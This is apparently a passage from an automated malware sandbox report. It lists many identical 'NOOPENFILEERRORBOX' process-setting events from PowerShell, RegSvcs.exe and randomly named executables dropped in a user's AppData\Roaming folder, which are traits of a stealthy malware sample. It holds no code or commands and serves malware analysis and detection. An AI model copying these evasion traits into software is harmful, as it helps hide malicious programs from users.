                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dWXyZYb.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOX
